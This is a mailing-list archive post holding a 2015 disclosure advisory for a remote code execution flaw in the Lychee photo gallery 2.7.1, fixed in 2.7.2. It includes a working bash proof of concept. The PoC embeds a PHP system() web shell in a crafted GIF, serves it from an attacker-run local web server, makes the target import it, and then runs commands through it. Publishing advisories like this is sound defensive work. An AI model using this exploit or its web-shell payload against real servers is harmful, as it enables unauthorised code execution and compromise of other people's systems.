lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Thu, 16 Apr 2015 16:25:43 +0200
From: Filippo Cavallarin <>
Subject: Lychee 2.7.1 remote code execution

Advisory ID: SGMA15-002
Title:	Lychee remote code execution
Product: Lychee
Version: 2.7.1 and probably prior
Vulnerability type:	Remote Code Execution
Risk level:	High
Credit:	Filippo Cavallarin -
Vendor notification: 2015-04-12
Vendor fix: 2015-04-13
Public disclosure: 2015-04-15


Lychee version 2.7.1 and probably below suffers from remote code execution vulnerability.

The vulnerability resides in the importUrl function that fails to restrict file types due to the lack of file extension validation.
Since the imported file is stored in a web-readable directory where php files can be executed, remote code execution can be achieved. 

Even if the import is limited to image files only, an attacker can abuse this vulnerability by importing a 
specially crafted image file containing PHP code.

To exploit this vulnerability the attacker must be logged as administrator.

The following proof of concept demostrates the issue


CMD="uname -a"

cd /tmp || exit 1

echo "Creating gif..."
GIF="\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x21\xFE\x1A<?php system('$CMD')?>"
echo -e $GIF > gif.php

echo "Starting local webserver"
python -m SimpleHTTPServer > /dev/null 2>&1 &

sleep 1

echo "Starting the import procedure"
curl "http://$LYCHEE_HOST/php/api.php" -H "Cookie: PHPSESSID=$PHPSESSID"  --data "function=importUrl&url=http%3A//$LOCALIP:8000/gif.php&albumID=0"

sleep 5

kill %1
rm gif.php

echo "Executing command.."
curl "http://$LYCHEE_HOST/data/gif.php"



Upgrade to Lychee version 2.7.2


Filippo Cavallarin

Powered by blists - more mailing lists